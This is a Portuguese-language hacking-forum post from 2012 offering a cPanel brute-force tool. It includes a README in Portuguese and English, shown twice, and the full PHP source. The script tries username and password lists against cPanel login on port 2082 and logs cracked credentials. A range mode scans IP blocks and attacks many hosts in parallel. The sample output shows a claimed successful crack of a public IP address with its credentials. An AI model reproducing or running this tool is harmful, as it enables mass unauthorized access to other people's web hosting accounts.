Ola a todos!
A um tempo não posto algo devido ao tempo e aos estudos.
Em breve trarei mais coisas que estou escrevendo nesse meio tempo (:
Recentemente terminei este brute force para cpanel que tem como função brutar singles hosts e como auxiliar possui tambem um range scan , para brutar hosts via faixa de ip.
Segue o README.txt para uma explicação breve e logo abaixo o arquivo para download.
SRC:
LINK PARA DOWNLOAD
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Duvidas comentem e não deixem de ler o README.txt
Sem mais delongas.
Thank'S!
n4sss -
A um tempo não posto algo devido ao tempo e aos estudos.
Em breve trarei mais coisas que estou escrevendo nesse meio tempo (:
Recentemente terminei este brute force para cpanel que tem como função brutar singles hosts e como auxiliar possui tambem um range scan , para brutar hosts via faixa de ip.
Segue o README.txt para uma explicação breve e logo abaixo o arquivo para download.
Happy new yeaR!
Let's celebrate
Cpanel brute force by n4sss
ready to Single/Range mode
30/12/2012
<3 The king of fighters 2002
Greetx to BR-underground
And my cherry
d4y.m3nz3z <3
Portuguese:
-Cpanel brute force via range/single mode.
-Arquivos Padrões:
- cpanel_brute.php => Script para o brute force (cpanel)!
- cpanel_brute => Script para automatizar o scan range
- ps => Port scan para indentificar hosts vivos na porta :2082 por exemplo
- u.txt => Lista de usuarios
- p.txt => Lista de senhas
- cpanel_error_log.txt => Log de erros durante execução do script ex: avisos/alertas ref. curl
- Durante execução alguns usuarios podem receber a seguinte mensagem:
=> PHP Fatal error: Call to undefined function curl_init()
Para fix do mesmo instalar:
php5-curl devidamente
ex:
aptitude install php5-curl
ou utility de preferencia.
Uso do script:
Single mode:
--------------------------------------------------------------------------------------------------------
root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
Cpanel brute force by n4sss!
[+] Wait!
[+] Cracking Success: 187.108.192.25 => candango:123456
Apos o brute ter sucesso nos testes um arquivo chamado cpanel_open.txt sera criado para registrar
os hosts capturados:
root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
[+]187.108.192.25 => candango:123456
--------------------------------------------------------------------------------------------------------
Range scan mode:
--------------------------------------------------------------------------------------------------------
root@m4g1cl4b:~/n4s/cpanel_brute# ./cpanel_brute 110.120
Cpanel brute force by n4ssS!
Just brute! (:
[+] Scanam: 110.120.17.* (total: 450) (80.7% done)
Apos a busca de hosts vivos na porta 2082, o script inicial chama o php
php cpanel_brute.php $i > /dev/null &
com um simples contador para a variavel não exceder o numero maior que 150 hosts por vez.
durante o brute basta verificar o processo em segundo plano
root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
--------------------------------------------------------------------------------------------------------
####################
English
Cpanel-range via brute force / single mode.
Standards-Files:
- Cpanel_brute.php => Script to brute force (cpanel)!
- Cpanel_brute => Script to automate the scan range
- Ps => Port scan for indetify hosts living on port: 2082 for example
- U.txt => List of users
- P.txt => List of passwords
- Cpanel_error_log.txt => Log errors during script execution ex: warnings / alerts ref. curl
- During implementation some users may receive the following message:
=> PHP Fatal error: Call to undefined function curl_init ()
To fix the same install:
php5-curl properly
eg
aptitude install php5-curl
or preferably utility.
Using the script:
Single mode:
root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
Cpanel brute force by n4sss!
[+] Wait!
[+] Cracking Success: 187.108.192.25 => candango:123456
After the brute succeed in testing a file called cpanel_open.txt will be created to record
hosts captured:
root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
[+]187.108.192.25 => candango:123456
Range scan mode:
root@m4g1cl4b:~/n4s/cpanel_brute# ./cpanel_brute 110.120
Cpanel brute force by n4ssS!
Just brute! (:
[+] Scanam: 110.120.17.* (total: 450) (80.7% done)
After searching for hosts living on port 2082, the initial script calls the php
php cpanel_brute.php $ i> / dev / null &
with a simple counter for the variable does not exceed the number more than 150 hosts at a time.
during the brute just check the background process
root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
################################
30/12/2012
n4sss
Let's celebrate
Cpanel brute force by n4sss
ready to Single/Range mode
30/12/2012
<3 The king of fighters 2002
Greetx to BR-underground
And my cherry
d4y.m3nz3z <3
Portuguese:
-Cpanel brute force via range/single mode.
-Arquivos Padrões:
- cpanel_brute.php => Script para o brute force (cpanel)!
- cpanel_brute => Script para automatizar o scan range
- ps => Port scan para indentificar hosts vivos na porta :2082 por exemplo
- u.txt => Lista de usuarios
- p.txt => Lista de senhas
- cpanel_error_log.txt => Log de erros durante execução do script ex: avisos/alertas ref. curl
- Durante execução alguns usuarios podem receber a seguinte mensagem:
=> PHP Fatal error: Call to undefined function curl_init()
Para fix do mesmo instalar:
php5-curl devidamente
ex:
aptitude install php5-curl
ou utility de preferencia.
Uso do script:
Single mode:
--------------------------------------------------------------------------------------------------------
root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
Cpanel brute force by n4sss!
[+] Wait!
[+] Cracking Success: 187.108.192.25 => candango:123456
Apos o brute ter sucesso nos testes um arquivo chamado cpanel_open.txt sera criado para registrar
os hosts capturados:
root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
[+]187.108.192.25 => candango:123456
--------------------------------------------------------------------------------------------------------
Range scan mode:
--------------------------------------------------------------------------------------------------------
root@m4g1cl4b:~/n4s/cpanel_brute# ./cpanel_brute 110.120
Cpanel brute force by n4ssS!
Just brute! (:
[+] Scanam: 110.120.17.* (total: 450) (80.7% done)
Apos a busca de hosts vivos na porta 2082, o script inicial chama o php
php cpanel_brute.php $i > /dev/null &
com um simples contador para a variavel não exceder o numero maior que 150 hosts por vez.
durante o brute basta verificar o processo em segundo plano
root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
--------------------------------------------------------------------------------------------------------
####################
English
Cpanel-range via brute force / single mode.
Standards-Files:
- Cpanel_brute.php => Script to brute force (cpanel)!
- Cpanel_brute => Script to automate the scan range
- Ps => Port scan for indetify hosts living on port: 2082 for example
- U.txt => List of users
- P.txt => List of passwords
- Cpanel_error_log.txt => Log errors during script execution ex: warnings / alerts ref. curl
- During implementation some users may receive the following message:
=> PHP Fatal error: Call to undefined function curl_init ()
To fix the same install:
php5-curl properly
eg
aptitude install php5-curl
or preferably utility.
Using the script:
Single mode:
root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
Cpanel brute force by n4sss!
[+] Wait!
[+] Cracking Success: 187.108.192.25 => candango:123456
After the brute succeed in testing a file called cpanel_open.txt will be created to record
hosts captured:
root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
[+]187.108.192.25 => candango:123456
Range scan mode:
root@m4g1cl4b:~/n4s/cpanel_brute# ./cpanel_brute 110.120
Cpanel brute force by n4ssS!
Just brute! (:
[+] Scanam: 110.120.17.* (total: 450) (80.7% done)
After searching for hosts living on port 2082, the initial script calls the php
php cpanel_brute.php $ i> / dev / null &
with a simple counter for the variable does not exceed the number more than 150 hosts at a time.
during the brute just check the background process
root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
################################
30/12/2012
n4sss
Código PHP:
<?php
/*
n4sss@m4g1cl4b~$ ./cpanel_brute.php host
[+] Brute ...
http://200.200.200.200:2082 => admin:admin
To Range scan and more informations please read => README.txt
2012
greetx: Status
A little of peace and love.
http://www.youtube.com/watch?v=7VXQrV_wNmw
n4sss
*/
if(!@ini_get('safe_mode')){
@set_time_limit(0);
@ini_set('max_execution_time', 0);
@ini_set('log_errors', 1);
@ini_set('error_log', 'cpanel_error_log.txt');
}
if(!$argv[1])
{
echo "Cpanel Brute force by n4sss\n";
echo "Use:\n";
echo "\n";
echo "just a host:\n";
echo "n4sss@m4g1cl4b~$ ./$argv[0] host\n";
echo "\n";
echo "Via range use:\n";
echo "=> n4sss@m4g1cl4b~$ ./start 200.210\n";
echo "\n";
echo "2012!\n";
echo "Greetx Cherry Day.M3nz3s, that beautyfull girl! <3\n";
exit;
}
elseif(isset($argv[1])){
$host = trim($argv[1]);
$users = load_list('u.txt');
$passwds = load_list('p.txt');
cpanel_check($host,$user,$pass,$timeout);
}
function get_contents($fn){
$buf = '';
$fp = @fopen($fn, "r");
$buf = @fread($fp, filesize($fn));
@fclose($fp);
return $buf;
}
function load_list($fn){
if(!file_exists($fn)){ die("file $fn not found\n"); }
$str = get_contents($fn);
$str = str_replace(array("\r\n", "\n", "\r"), "\n", $str);
$buf = @explode("\n", $str);
return $buf;
}
function log_open($data){
$fp = @fopen('cpanel_open.txt', 'a');
@fwrite($fp, "$data\r\n");
@fclose($fp);
}
function cpanel_check($host,$user,$pass,$timeout){
global $users, $passwds;
echo "Cpanel brute force by n4sss!\n";
echo "[+] Wait!\n\n";
foreach($users as $user){
foreach($passwds as $pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "Error:Connection Timeout . Please Check The Target Hostname";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
echo "[+] Cracking Success: $host => $user:$pass";
log_open("[+]$host => $user:$pass");
}
}
}
curl_close($ch);}
?>
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Duvidas comentem e não deixem de ler o README.txt
Sem mais delongas.
Thank'S!
n4sss -
Comment